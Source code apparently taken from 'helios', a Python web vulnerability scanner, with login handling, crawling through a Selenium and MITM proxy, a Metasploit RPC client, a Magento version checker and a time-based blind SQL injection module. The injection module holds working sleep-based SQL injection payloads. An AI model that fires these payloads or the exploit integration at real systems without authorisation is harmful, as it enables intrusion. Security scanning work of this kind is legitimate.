            self.headers[k] = headers[k]

        page = self.session_obj.get(token_url)
        page_data = {}
        for x in re.findall('(<input.+?>)', page.text, re.IGNORECASE):
            n = re.search('name="(.+?)"', x, re.IGNORECASE)
            v = re.search('value="(.+?)"', x, re.IGNORECASE)
            if n and v:
                page_data[n.group(1)] = v.group(1)

        for custom in data:
            page_data[custom] = data[custom]
        self.logger.debug("Login payload: %s" % str(page_data))
        return self.session_obj.post(url, data=page_data, headers=self.headers, allow_redirects=False)

    def pre_parse(self, options):
        headers = options.login_header
        if not options.login_type:
            return None
        self.logger.info("Running Login Sequence")
        if headers:
            try:
                for header in headers:
                    s = header.split(':')
                    key = s[0].strip()
                    value = ':'.join(s[1:])
                    self.headers[key] = value
            except Exception as e:
                self.logger.warning("Login Error: Error processing headers: %s" % str(e))

        if options.login_type == "basic":
            creds = options.login_creds
            if not creds:
                self.logger.error("Login Error: --login-creds is required for Basic Auth")
                return None
            self.basic_auth(creds)

        if options.login_type == "header":
            if not headers:
                self.logger.error("Login Error: at least one --login-header is required for Header Auth")
                return None

        token_url = options.token_url
        url = options.login_url
        data = options.login_data
        if not token_url:
            token_url = url
        try:
            if options.login_type == "form":
                return self.login_form(url=token_url, data=data)
            if options.login_type == "form-csrf":
                return self.login_form_csrf(url=url, data=data, token_url=token_url)
        except Exception as e:
            self.logger.error("Error in Login sequence: %s" % str(e))



from helios.core.utils import params_to_str


class Raw:
    headers = {}
    text = ""
    code = None
    cookies = None
    final_url = None
    content_type = None

    request_object = None

    def __init__(self, text, code, headers, cookies, object, final_url, ctype):
        self.headers = headers
        self.code = code
        self.cookies = cookies
        self.request_object = object
        self.text = text
        self.final_url = final_url
        self.content_type = ctype

    def to_string(self):
        outstr = "[%d] %s %s type:%s (%d bytes)" % (self.code,
                                                    self.request_object.url,
                                                    params_to_str(self.request_object.data) if self.request_object.data else "",
                                                    self.content_type,
                                                    len(self.text))
        return outstr



#!/usr/bin/env python
# -*- coding: utf-8 -*-


# This will start the helios framework

import argparse
import sys

import helios


def main():
    usage = """%s: args""" % sys.argv[0]
    parser = argparse.ArgumentParser(usage)
    parser.add_argument('-u', '--url', help='URL to start with', dest='url', default=None)
    parser.add_argument('--urls', help='file with URL\'s to start with', dest='urls', default=None)
    parser.add_argument('--user-agent', help='Set the user agent', dest='user_agent', default=None)
    parser.add_argument('-a', '--all', help='Run everything', dest='allin', default=None, action='store_true')
    parser.add_argument('-o', '--output', help='Output file to write to (JSON)', dest='outfile', default=None)

    group_driver = parser.add_argument_group(title="Chromedriver Options")
    group_driver.add_argument('-d', '--driver', help='Run WebDriver for advanced discovery',
                              dest='driver', action='store_true')
    group_driver.add_argument('--driver-path', help='Set custom path for the WebDriver', dest='driver_path',
                              default=None)
    group_driver.add_argument('--show-driver', help='Show the WebDriver window', dest='show_driver',
                              default=None, action='store_true')
    group_driver.add_argument('--interactive', help='Dont close the WebDriver window until keypress',
                              dest='interactive', default=False, action='store_true')
    group_driver.add_argument('--no-proxy', help='Disable the proxy module for the WebDriver', dest='proxy',
                              action='store_false', default=True)
    group_driver.add_argument('--proxy-port', help='Set a custom port for the proxy module, default: 3333',
                              dest='proxy_port', default=None)

    group_crawler = parser.add_argument_group(title="Crawler Options")
    group_crawler.add_argument('-c', '--crawler', help='Enable the crawler', dest='use_crawler', action='store_true')
    group_crawler.add_argument('--max-urls', help='Set max urls for the crawler', dest='maxurls', default=200)
    group_crawler.add_argument('--scopes',
                               help='Extra allowed scopes, comma separated hostnames (* can be used to wildcard)',
                               dest='scopes', default=None)
    group_crawler.add_argument('--scope-options', help='Various scope options',
                               dest='scope_options', default=None)

    group_crawler.add_argument('--wordlist', help='Additional web discovery wordlist',
                               dest='wl_file', default=None)
    group_crawler.add_argument('--wordlist-ext',
                               help='Additional comma separated web discovery extensions (requires wordlist)',
                               dest='wl_ext', default=None)
    group_crawler.add_argument('--wordlist-404', help='Custom 404 text pattern (default: use status code)',
                               dest='wl_404', default=None)
    group_crawler.add_argument('--wordlist-status-codes', help='Custom comma separated found status codes',
                               dest='wl_codes', default=None)

    group_scanner = parser.add_argument_group(title="Scanner Options")
    group_scanner.add_argument('-s', '--scan', help='Enable the scanner', dest='scanner',
                               default=False, action='store_true')
    group_scanner.add_argument('--adv', help='Enable the advanced scripts', dest='use_adv_scripts',
                               default=False, action='store_true')
    group_scanner.add_argument('--cms', help='Enable the CMS module', dest='cms_enabled',
                               action='store_true', default=False)
    group_scanner.add_argument('--webapp', help='Enable scanning of web application frameworks like Tomcat / Jboss',
                               dest='webapp_enabled', action='store_true', default=False)
    group_scanner.add_argument('--optimize', help='Optimize the Scanner engine (uses more resources)', dest='optimize',
                               action='store_true', default=False)
    group_scanner.add_argument('--options',
                               help='Comma separated list of scan options '
                                    '(discovery, passive, injection, dangerous, all)',
                               dest='custom_options', default=None)

    group_login = parser.add_argument_group(title="Login Options")
    group_login.add_argument('--login', help='Set login method: basic, form, form-csrf, header',
                             dest='login_type', default=None)
    group_login.add_argument('--login-creds', help='Basic Auth credentials username:password',
                             dest='login_creds', default=None)
    group_login.add_argument('--login-url', help='Set the URL to post to (forms)', dest='login_url', default=None)
    group_login.add_argument('--login-data', help='Set urlencoded login data (forms)',
                             dest='login_data', default=None)
    group_login.add_argument('--token-url', help='Get CSRF tokens from this page (default login-url)',
                             dest='token_url', default=None)
    group_login.add_argument('--header', help='Set this header on all requests (OAuth tokens etc..) '
                                              'example: "Key: Bearer {token}"',
                             dest='login_header', default=None, action="append")

    group_adv = parser.add_argument_group(title="Advanced Options")
    group_adv.add_argument('--threads', help='Set a custom number of crawling / scanning threads', dest='threads',
                           default=None)
    group_adv.add_argument('--sslverify', default=False, action="store_true", dest="sslverify",
                           help="Enable SSL verification (requests will fail without proper cert)")

    group_adv.add_argument('--database', help='The SQLite database to use', dest='db', default="helios.db")
    group_adv.add_argument('-v', '--verbose', dest="verbose", default=False, action="store_true",
                           help="Show verbose stuff")

    group_msf = parser.add_argument_group(title="Metasploit Options")
    group_msf.add_argument('--msf', help='Enable the msfrpcd exploit module', dest='msf', default=False,
                           action='store_true')
    group_msf.add_argument('--msf-host', help='Set the msfrpcd host', dest='msf_host', default="localhost")
    group_msf.add_argument('--msf-port', help='Set the msfrpcd port', dest='msf_port', default="55553")
    group_msf.add_argument('--msf-creds', help='Set the msfrpcd username:password',
                           dest='msf_creds', default="msf:msfrpcd")
    group_msf.add_argument('--msf-endpoint', help='Set a custom endpoint URI', dest='msf_uri', default="/api/")
    group_msf.add_argument('--msf-nossl', help='Disable SSL', dest='msf_nossl', default=False)
    group_msf.add_argument('--msf-start', help='Start msfrpcd if not running already',
                           dest='msf_autostart', default=False, action='store_true')

    opts = parser.parse_args(sys.argv[1:])
    urls = []
    if not opts.url:
        if not opts.urls:
            print("-u or --urls is required to start")
            sys.exit(1)
        else:
            with open(opts.urls, 'r') as urlfile:
                urls = [x.strip() for x in urlfile.read().strip().split('\n')]
                print("Got %d start URL's from file %s" % (len(urls), opts.urls))
    else:
        urls = [opts.url]

    instance = helios.Helios(opts)
    try:
        instance.run(urls, opts.scopes)
    except KeyboardInterrupt:
        instance.logger.warning("KeyboardInterrupt received, shutting down")
        instance.db.end()
    except Exception as e:
        if instance.options.verbose:
            instance.db.end()
            raise
        instance.logger.error(str(e))
        instance.logger.warning("Critical error received, shutting down")
        instance.db.end()


if __name__ == "__main__":
    main()



import copy
import string
import random
try:
    from urllib import quote_plus
except ImportError:
    from urllib.parse import quote_plus


# function to make key => value dict lowercase
def multi_to_lower(old_dict, also_values=False):
    new = {}
    for key in old_dict:
        new[key.lower()] = old_dict[key].lower() if also_values else old_dict[key]
    return new


def random_string(length=5, pool=string.ascii_lowercase):
    return ''.join(random.choice(pool) for i in range(length))


# extract all parameters from a string (url parameters or post data parameters)
def params_from_str(string):
    out = {}
    if "&" in string:
        for param in string.split('&'):
            if "=" in param:
                sub = param.split('=')
                key = sub[0]
                value = sub[1]
                out[key] = value
            else:
                out[param] = ""
    else:
        if "=" in string:
            sub = string.split('=')
            key = sub[0]
            value = sub[1]
            out[key] = value
        else:
            out[string] = ""
    return out


# same as above but the other way around
def params_to_str(params):
    groups = []
    for key in params:
        groups.append("%s=%s" % (quote_plus(key), quote_plus(params[key]) if params[key] else ""))
    return '&'.join(groups)


# checks if a script name already exists in the results object
def has_seen_before(key, results):
    for x in results:
        if x['script'] == key:
            return True
    return False


def aspx_strip_internal(post):
    out = {}
    for name in post:
        value = post[name]
        if not name.startswith("__"):
            out[name] = value
    return out


# generate unique url / post data pairs because we do not care about other variations during scanning
def uniquinize(urls):
    out = []
    seen = []
    for x in urls:
        url, data = copy.copy(x)
        newparams, newdata = copy.copy(x)
        if "?" in url:
            u, p = url.split('?')
            p = p.replace(';', '&')
            params = params_from_str(p)
            params = dict(params)
            for k in params:
                params[k] = ""
            newparams = "%s?%s" % (u, params_to_str(params))
        if newdata:
            newdata = dict(newdata)
            for k in newdata:
                newdata[k] = ""
        payload = [newparams, newdata]
        if payload in seen:
            continue
        seen.append(payload)
        out.append([url, data])
    return out


# create dict from response class
def response_to_dict(response):
    return {
        'request': {
            'url': response.request_object.url,
            'data': response.request_object.data,
            'headers': dict(response.request_object.request_headers),
            'cookies': dict(response.request_object.response.cookies)
        },
        'response': {
            'code': response.code,
            'headers': dict(response.headers),
            'content-type': response.content_type
        }
    }


# same but for requests response
def requests_response_to_dict(response):
    return {
        'request': {
            'url': response.request.url,
            'data': response.request.body,
            'headers': dict(response.request.headers),
            'cookies': dict(response.cookies)
        },
        'response': {
            'code': response.status_code,
            'headers': dict(response.headers),
            'content-type': response.headers['Content-Type'] if 'Content-Type' in response.headers else ""
        }
    }



import time
import logging
import sys
import os
import threading

from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.webdriver import Chrome, ChromeOptions
from filelock import FileLock

from helios.ext.mefjus.proxy import *


class GhostDriverInterface:
    driver_path = "drivers\\chromedriver.exe"
    driver = None
    logger = None
    page_sleep = 2
    proxy_host = "127.0.0.1"
    proxy_port = 3333

    def __init__(self, custom_path=None, logger=None, show_browser=False, use_proxy=True, proxy_port=None):
        if custom_path:
            self.driver_path = custom_path
        else:
            current_fp = os.path.abspath(os.path.dirname(__file__))
            self.driver_path = os.path.join(current_fp, "../../drivers/chromedriver.exe")
        if proxy_port:
            self.proxy_port = int(proxy_port)
        self.logger = logging.getLogger("WebDriver")
        self.logger.setLevel(logger)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logger)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        self.logger.addHandler(ch)
        self.logger.debug("Starting Web Driver")
        if not os.path.exists(self.driver_path):
            self.logger.warning("Error loading driver from path: %s the driver module will be disabled\n"
                                "Get the latest one from http://chromedriver.chromium.org/downloads" % self.driver_path)
            return
        self.start(use_proxy=use_proxy, show_browser=show_browser)

    def start(self, use_proxy=True, show_browser=False):
        try:
            options = ChromeOptions()
            options.add_argument("ignore-certificate-errors")
            options.add_argument("--ignore-ssl-errors")
            if not show_browser:
                options.add_argument("--headless")
            if use_proxy:
                self.logger.info("Enabled proxy %s:%d" % (self.proxy_host, self.proxy_port))
                options.add_argument("--proxy-server=http://" + "%s:%d" % (self.proxy_host, self.proxy_port))

            self.driver = Chrome(executable_path=self.driver_path, chrome_options=options)
        except Exception as e:
            self.logger.error("Error creating WebDriver object: %s" % str(e))

    def get(self, url):
        if not self.driver:
            return
        self.logger.debug("GET %s" % url)
        try:
            self.driver.get(url)
        except UnexpectedAlertPresentException:
            alert = self.driver.switch_to.alert
            alert.accept()
            self.logger.warning("Page %s threw an alert. disposing and requesting page again" % url)
            self.driver.get(url)
        except Exception as e:
            self.logger.error("Page %s threw an error: %s" % (url, str(e)))

        time.sleep(self.page_sleep)
        self.logger.debug("OK %s" % url)

    def close(self):
        self.logger.debug("Stopping Driver")
        if not self.driver:
            return
        self.driver.stop_client()
        self.driver.close()
        time.sleep(1)


class HTTPParser:

    @staticmethod
    def parse(request):
        request = request.strip()
        data = request.split('\r\n')
        method, path, _ = data[0].split()
        postdata = None
        if method == "POST" and data[len(data)-2] == "":
            postdata = data[len(data)-1]
            data = data[:-2]
        return method, data[1:], path, postdata

    @staticmethod
    def extract_host(headers):
        for row in headers:
            if ":" in row:
                pairs = row.split(':')
                if len(pairs) > 2:
                    continue
                key, value = pairs[0], pairs[1]
                key = key.strip()
                value = value.strip()
                if key.lower() == "host":
                    return value
        return ""

    @staticmethod
    def string_to_urltree(input, use_https=False):
        tree = []
        if input and len(input):
            for row in input.strip().split('\n'):
                try:
                    method, host, url, data = row.split('\t')
                    url = "http%s://%s%s" % ("s" if use_https else "", host, url)
                    if method == "POST" and data != "0":
                        tree.append([url, HTTPParser.params_from_str(data)])
                    else:
                        tree.append([url, None])
                except Exception as e:
                    pass
        return tree

    @staticmethod
    def params_from_str(string):
        out = {}
        if "&" in string:
            for param in string.split('&'):
                if "=" in param:
                    sub = param.split('=')
                    key = sub[0]
                    value = sub[1]
                    out[key] = value
                else:
                    out[key] = ""
        else:
            if "=" in string:
                sub = string.split('=')
                key = sub[0]
                value = sub[1]
                out[key] = value
            else:
                out[string] = ""
        return out


class DebugInterceptor(RequestInterceptorPlugin, ResponseInterceptorPlugin):
    proxy_log = "output.txt"
    proxy_log_lock = "output.txt.lock"

    def do_request(self, data):
        method, headers, path, postdata = HTTPParser.parse(data)
        host = HTTPParser.extract_host(headers)
        lock = FileLock(self.proxy_log_lock, timeout=5)
        with lock:
            lock.acquire()
            with open(self.proxy_log, 'a') as f:
                f.write("%s\t%s\t%s\t%s\n" % (method, host, path, postdata if postdata else "0"))
            lock.release()
        return data

    def do_response(self, data):
        return data


class CustomProxy:
    proxyThread = None
    proxy_host = '127.0.0.1'
    proxy_port = 3333
    logger = logging.getLogger("Proxy")
    proxy = None
    ca_file = ""
    ca_dir = ""
    proxy_log = "output.txt"

    def __init__(self, custom_path=None, cert=None, logger=logging.INFO, proxy_port=None):
        self.logger.setLevel(logger)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logger)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        if proxy_port:
            self.proxy_port = int(proxy_port)
        if not self.logger.handlers:
            self.logger.addHandler(ch)
        self.logger.debug("Loaded Proxy")
        if custom_path:
            self.ca_dir = custom_path
        if cert:
            self.ca_file = cert
        self.logger.debug("Cleaning proxy log: %s" % self.proxy_log)
        with open(self.proxy_log, 'w') as f:
            f.write("")

    def start(self):
        self.proxyThread = threading.Thread(target=self.subroutine)
        self.logger.debug("Starting Proxy")
        self.proxyThread.start()
        time.sleep(1)

    def subroutine(self):
        if self.ca_file:
            self.proxy = AsyncMitmProxy(ca_file=os.path.join(self.ca_dir, self.ca_file), server_address=(self.proxy_host, self.proxy_port))
        else:
            self.proxy = AsyncMitmProxy()
        self.proxy.register_interceptor(DebugInterceptor)
        try:
            self.proxy.serve_forever()
        except:
            return


class Mefjus:
    seen = []
    ca_dir = "certs"
    ca_file = "mefjus.pem"
    proxy = None
    driver = None
    show_browser = None

    def __init__(self, logger=logging.INFO, driver_path=None, proxy_port=3333, use_proxy=True, use_https=True, show_driver=False):
        if use_proxy:
            self.proxy = CustomProxy(logger=logger, proxy_port=proxy_port)
        self.driver = GhostDriverInterface(logger=logger, custom_path=driver_path, proxy_port=proxy_port, use_proxy=use_proxy, show_browser=show_driver)
        self.use_https = use_https

    def close(self):
        if self.driver:
            self.driver.close()
            time.sleep(1)
        if self.proxy:
            self.proxy.proxy.server_close()

    def run(self, urls, interactive=False):
        if self.proxy:
            self.proxy.ca_dir = self.ca_dir
            if not os.path.exists(self.proxy.ca_dir):
                os.mkdir(self.proxy.ca_dir)
            self.proxy.ca_file = self.ca_file
            self.proxy.start()
        for url in urls:
            if type(url) is list:
                url = url[0]
            if url not in self.seen:
                self.seen.append(url)
                self.driver.get(url)
        if interactive:
            print("Interactive mode enabled, the browser will continue to function and log proxy-request.")
            print("Press any key to continue")
            try:
                x = input()
            except:
                pass
        self.close()
        return self.read_output()

    def read_output(self):
        with open('output.txt') as f:
            tree = HTTPParser.string_to_urltree(f.read(), use_https=self.use_https)
            return tree



import logging
import requests
import msgpack
import sys
from time import sleep

class Client:
    ssl = True
    endpoint = None
    username = ""
    password = ""

    token = None
    is_working = False

    def __init__(self, endpoint, username="msf", password="metasploit", use_ssl=True, log_level=logging.INFO):
        self.endpoint = endpoint
        self.username = username
        self.password = password
        self.ssl = use_ssl
        self.logger = logging.getLogger("MetaMonster")
        self.logger.setLevel(log_level)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(log_level)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        if not self.logger.handlers:
            self.logger.addHandler(ch)
        self.logger.setLevel(log_level)
        self.log_level = log_level
        if self.ssl:
            requests.packages.urllib3.disable_warnings()

    def send(self, method, data=[], is_second_attempt=False):
        try:
            headers = {"Content-type": "binary/message-pack"}
            if method != "auth.login" and self.token:
                data.insert(0, self.token)
            data.insert(0, method)
            result = requests.post(self.endpoint, data=self.encode(data), verify=False, headers=headers)
            decoded = self.decode(result.content)
            return decoded
        except requests.ConnectionError as e:
            self.logger.warning("Cannot connect to endpoint %s. %s" % (self.endpoint, str(e)))
            if is_second_attempt:
                self.logger.error("Second connection attempt failed. cannot connect to endpoint %s" % self.endpoint)
                self.is_working = False
                return None
            else:
                self.logger.info("Retrying in 10 seconds")
                sleep(10)
                return self.send(method, data, True)

        except requests.Timeout as e:
            self.logger.warning("Timeout connecting to endpoint %s." % self.endpoint)
            if is_second_attempt:
                self.logger.error("Second connection attempt failed. cannot connect to endpoint %s" % self.endpoint)
                self.is_working = False
                return None
            else:
                self.logger.info("Retrying in 10 seconds")
                sleep(10)
                return self.send(method, data, True)
        except Exception:
            self.logger.error("Uncaught error %s" % self.endpoint)
            self.is_working = False
            return None

    def encode(self, data):
        return msgpack.packb(data)

    def decode(self, data):
        return msgpack.unpackb(data)

    def auth(self):
        self.logger.debug("Authenticating...")
        res = self.send('auth.login', [self.username, self.password])
        if not res:
            return False

        if b'token' in res:
            self.logger.debug("Authentication successful")
            self.token = res[b'token'].decode()
            self.is_working = True
            return True
        else:
            self.logger.warning("Incorrect credentials for msfrpcd, cannot start")
            self.is_working = False
            return False

    def request(self, action, data=[]):
        if not self.token:
            self.auth()
        if self.is_working:
            return self.send(action, data)
        return None



import re
import requests
try:
    from urllib import quote_plus
    import urlparse
except ImportError:
    from urllib.parse import quote_plus
    import urllib.parse as urlparse
import helios.modules.module_base


class Module(helios.modules.module_base.Base):

    def __init__(self):
        self.name = "Robots.txt"
        self.injections = {}
        self.module_types = ['discovery']
        self.input = "base"
        self.output = "crawler"

    def run(self, url, data=None, headers=None, cookies=None):
        self.headers = headers
        self.cookies = cookies
        url = urlparse.urljoin(url, '/robots.txt')
        result = self.send(url, None, None)
        output = []
        if result:
            for entry in re.findall('(?:[Dd]is)?[Aa]llow:\s*(.+)', result.text):
                if "*" in entry:
                    # we do not want dem wildcard
                    continue
                newurl = urlparse.urljoin(url, entry).strip()
                newurl = newurl.replace('$', '')
                if newurl == url:
                    continue
                if newurl not in output and self.scope.in_scope(newurl):
                    output.append(newurl)
        return output

    def send(self, url, params, data):
        result = None
        headers = self.headers
        cookies = self.cookies
        try:
            if data:
                result = requests.post(url, params=params, data=data, headers=headers, cookies=cookies)
            else:
                result = requests.get(url, params=params, headers=headers, cookies=cookies)
        except Exception as e:
            print(str(e))
        return result



import sqlite3
try:
    from queue import Queue
except ImportError:
    from Queue import Queue
import threading
import time
import os


class SQLiteWriter:
    db = None
    scan = 0
    todo = Queue(maxsize=0)
    db_file = None
    active = True

    _db_thread = None
    seen_entries = []

    def init(self, dbfile):
        if not os.path.exists(dbfile):
            print("Database file %s not found, creating new one" % dbfile)
            self.db = sqlite3.connect(self.db_file)
            cursor = self.db.cursor()
            cursor.execute('CREATE TABLE "scans" ('
                           '"id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,'
                           '"start_url"  TEXT,'
                           '"domain"  TEXT,'
                           '"started"  DATETIME,'
                           '"ended"  DATETIME'
                           ');')

            cursor.execute('CREATE TABLE "results" ('
                           '"id"  INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,'
                           '"scan"  INTEGER,'
                           '"type"  TEXT,'
                           '"module"  TEXT,'
                           '"severity"  INTEGER,'
                           '"detected"  DATETIME,'
                           '"data"  TEXT);')


            self.db.commit()
            cursor.close()
            self.db.close()

    def open_db(self, database_file):
        self.db_file = database_file
        self.init(self.db_file)
        self._db_thread = threading.Thread(target=self.loop)

    def start(self, url, domain):
        self._db_thread.start()
        sql = '''INSERT INTO scans(start_url, domain ,started) VALUES(?,?,datetime('now'))'''
        self.todo.put((sql, (url, domain), "start"))

    def put(self, result_type, script, severity, text, allow_only_once=False):
        if allow_only_once:
            entry = [result_type, script]
            if entry in self.seen_entries:
                return
            self.seen_entries.append(entry)
        sql = '''INSERT INTO results(scan, type, module, severity, data, detected) 
        VALUES(?, ?, ?, ?, ?, datetime('now')
        )'''
        self.todo.put((sql, (self.scan, result_type, script, severity, text), "result"))

    def end(self):
        sql = '''UPDATE scans SET ended = datetime('now') WHERE id = %d''' % self.scan
        self.todo.put((sql, (), "end"))

    def loop(self):
        self.db = sqlite3.connect(self.db_file)
        while self.active:
            if self.todo.qsize() > 0:
                sql, args, output_type = self.todo.get()
                cur = self.db.cursor()
                cur.execute(sql, args)
                if output_type == "start":
                    self.scan = cur.lastrowid
                self.db.commit()
                if output_type == "end":
                    self.db.close()
                    self.active = False
            time.sleep(0.5)




import requests
import os


class BaseAPP:
    name = ""
    results = []
    options = {}
    cookies = {}
    logger = None
    app_url = None
    scope = None
    headers = {}

    def detect(self, url):
        return False

    def run(self, url, scan_options={}):
        self.options = scan_options
        self.logger.debug("Attempting detection of %s on URL: %s" % (self.name, url))
        if self.detect(url):
            if not self.app_url:
                self.app_url = url
            self.logger.info("%s was detected on URL: %s" % (self.name, self.app_url))
            self.test(self.app_url)

    def test(self, url):
        return

    # function to detect vulnerable versions from CVE entries
    def match_versions(self, vulns, version, url=None):
        for vuln in vulns:
            for vuln_version in vulns[vuln]:
                if version == vuln_version:
                    match_str = "%s version %s appears to be vulnerable to %s (version match: %s)" % \
                                (self.name, version, vuln, vuln_version)
                    result = {
                        'request': {'url': url},
                        'match': match_str
                    }
                    self.logger.info(match_str)
                    self.results.append(result)
                    break
                elif vuln_version.startswith(version):
                    match_str = "%s version %s might be vulnerable to %s (version match: %s)" % \
                                (self.name, version, vuln, vuln_version)
                    result = {
                        'request': {'url': url},
                        'match': match_str
                    }
                    self.logger.info(match_str)
                    self.results.append(result)

    def get_db(self, name):
        db_file = os.path.join(os.path.dirname(__file__), "databases", name)
        if os.path.exists(db_file) and os.path.isfile(db_file):
            with open(db_file, 'r') as f:
                data = f.read()
            return data

    def send(self, url, data=None, headers={}, redirects=True):
        result = None
        cookies = self.cookies
        for k in self.headers:
            headers[k] = self.headers[k]
        try:
            if data:
                result = requests.get(url, data=data, headers=headers, cookies=cookies, allow_redirects=redirects, verify=False)
            else:
                result = requests.get(url, headers=headers, cookies=cookies, allow_redirects=redirects, verify=False)
        except Exception as e:
            self.logger.warning("Request Exception: %s" % str(e))
            pass
        if not self.scope:
            return result
        # check if current URL is still in scope (fixes /blog 302->blog.domain.com issues)
        if result and self.scope.in_scope(result.url):
            return result
        return None



from helios.webapp import base_app
import re
import json

try:
    from urlparse import urljoin
except ImportError:
    from urllib.parse import urljoin


# This script detects vulnerabilities in the following PHP based products:
# - Magento / Magento2
class Scanner(base_app.BaseAPP):

    def __init__(self):
        self.name = "Magento"
        self.types = []

    def detect(self, url):
        directories = ['', 'magento', 'shop']
        for d in directories:
            path = urljoin(url, d)
            response = self.send(path)
            if response and response.status_code == 200 and "Magento" in response.text:
                self.app_url = path
                return True
        return False

    def test(self, url):
        mage_version = urljoin(url, 'magento_version')
        mage_page = self.send(mage_version)
        version = None
        if mage_page:
            # only (accurate) way to get installed version
            get_version = re.search(r'Magento/([\d\.]+)', mage_page.text, re.IGNORECASE)
            if get_version:
                version = get_version.group(1)
                # old versions of Enterprise are actually 2.0
                if version == "1.0" and "Enterprise" in mage_page.text:
                    version = "2.0"
                self.logger.info("%s version %s was identified from the magento_version call" % (self.name, version))

        if version:
            db = self.get_db("magento_vulns.json")
            data = json.loads(db)
            vulns = data['Magento']
            self.match_versions(vulns, version, url)



try:
    from urllib import quote_plus
except ImportError:
    from urllib.parse import quote_plus
import requests
import time
import random
import helios.modules.module_base
from helios.core.utils import requests_response_to_dict


class Module(helios.modules.module_base.Base):
    def __init__(self):
        self.name = "Blind SQL Injection (Time Based)"
        self.active = True
        self.module_types = ['injection', 'dangerous']
        self.possibilities = [
            '\' or sleep({sleep_value})--',
            '\' or sleep({sleep_value})\\*',
            '-1 or sleep({sleep_value})--',
            '-1 or sleep({sleep_value})\\*',
            'aaaaa\' or sleep({sleep_value}) or \'a\'=\''
        ]
        self.has_read_timeout = False
        self.timeout_state = 0
        self.max_timeout_state = 6  # 60 secs
        self.auto = True
        self.headers = {}
        self.cookies = {}
        self.input = "urldata"
        self.output = "vulns"
        self.severity = 3

    def run(self, url, data={}, headers={}, cookies={}):
        if not self.active and 'passive' not in self.module_types:
            # cannot send requests and not configured to do passive analysis on data
            return
        base, param_data = self.get_params_from_url(url)
        self.cookies = cookies
        self.headers = headers
        results = []
        if not data:
            data = {}
        for param in param_data:
            result = self.inject(base, param_data, data, parameter_get=param, parameter_post=None)
            if result:
                response, match = result
                results.append({'request': requests_response_to_dict(response), "match": match})

        for param in data:
            result = self.inject(base, param_data, data, parameter_get=None, parameter_post=param)
            if result:
                response, match = result
                results.append({'request': requests_response_to_dict(response), "match": match})
        return results

    def send(self, url, params, data):
        result = None
        headers = self.headers
        cookies = self.cookies
        start = time.time()
        # print(url, params, data)
        try:
            if data:
                result = requests.post(url, params=params, data=data, headers=headers, cookies=cookies)
            else:
                result = requests.get(url, params=params, headers=headers, cookies=cookies)
        except requests.Timeout:
            if self.has_read_timeout:
                if self.timeout_state > self.max_timeout_state:
                    self.close()
                    return None

                self.timeout_state += 1
                sleeptime = self.timeout_state * 10
                time.sleep(sleeptime)
                return self.send(url, params, data, headers, cookies)
            else:
                self.has_read_timeout = True
                self.timeout_state = 1
                sleeptime = self.timeout_state * 10
                time.sleep(sleeptime)
                return self.send(url, params, data, headers, cookies)
        except Exception:
            return False
        end = time.time()
        eslaped = end - start
        return eslaped, result

    def validate(self, url, params, data, injection_value, original_value, parameter_post=None, parameter_get=None):
        min_wait_time = random.randint(5, 10)
        injection_true = injection_value.replace('{sleep_value}', str(min_wait_time))
        injection_true = injection_true.replace('{original_value}', str(original_value))

        injection_false = injection_value.replace('{sleep_value}', str(0))
        injection_false = injection_false.replace('{original_value}', str(original_value))

        if parameter_get:
            tmp = dict(params)
            tmp[parameter_get] = injection_true
            result = self.send(url, params, tmp)
            if result:
                eslaped, object = result
                if eslaped > min_wait_time:
                    tmp = dict(params)
                    tmp[parameter_get] = injection_false
                    result = self.send(url, tmp, data)
                    if result:
                        eslaped, object = result
                        if eslaped < min_wait_time:
                            return object, eslaped
                        else:
                            return None
                else:
                    return None
        else:
            postenc = self.params_to_url("", data)[1:]
            tmp = dict(data)
            tmp[parameter_post] = injection_true
            result = self.send(url, params, tmp)
            if result:
                eslaped, object = result
                if eslaped > min_wait_time:
                    tmp = dict(params)
                    tmp[parameter_post] = injection_false
                    result = self.send(url, params, tmp)
                    if result:
                        eslaped, object = result
                        if eslaped < min_wait_time:
                            return object, eslaped
                    else:
                        return None
                else:
                    return None

    def inject(self, url, params, data=None, parameter_get=None, parameter_post=None):
        if parameter_get:
            tmp = dict(params)
            for injection_value in self.possibilities:
                min_wait_time = random.randint(5, 10)
                payload = injection_value.replace('{sleep_value}', str(min_wait_time))
                payload = payload.replace('{original_value}', str(params[parameter_get]))
                tmp[parameter_get] = payload
                result = self.send(url, tmp, data)
                if result:
                    eslaped, object = result
                    if eslaped > min_wait_time:
                        check_result = self.validate(url, params, data, injection_value, original_value=params[parameter_get], parameter_post=None,
                                      parameter_get=parameter_get)
                        if check_result:
                            return (object,
                                    {"injection": payload,
                                     "parameter": parameter_get,
                                     "location": "url",
                                     "server_sleep": eslaped
                                     })
            return False
        if parameter_post:
            tmp = dict(data)
            for injection_value in self.possibilities:
                min_wait_time = random.randint(5, 10)
                payload = injection_value.replace('{sleep_value}', str(min_wait_time))
                payload = payload.replace('{original_value}', str(data[parameter_post]))
                tmp[parameter_post] = payload
                result = self.send(url, params, tmp)
                if result:
                    eslaped, object = result
                    if eslaped > min_wait_time:
                        check_result = self.validate(url, params, data, injection_value, original_value=data[parameter_post], parameter_post=parameter_post,
                                      parameter_get=None)
                        if check_result:
                            return (object,
                                    {"injection": payload,
                                     "parameter": parameter_post,
                                     "location": "body",
                                     "server_sleep": eslaped
                                     })
            return False






import os
import json
from helios.core.engine import MatchObject, CustomRequestBuilder, RequestBuilder
from helios.core.utils import has_seen_before, response_to_dict
import sys
import logging
try:
    import urlparse
except ImportError:
    import urllib.parse as urlparse


class ScriptEngine:
    scripts_active = []
    scripts_fs = []
    scripts_passive = []
    results = []
    triggers = []
    can_fs = True
    can_exploit = True
    s = None
    options = None
    log_level = logging.INFO
    writer = None

    def __init__(self, options=None, logger=logging.INFO, database=None):
        self.logger = self.logger = logging.getLogger("ScriptEngine")
        self.logger.setLevel(logger)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logger)
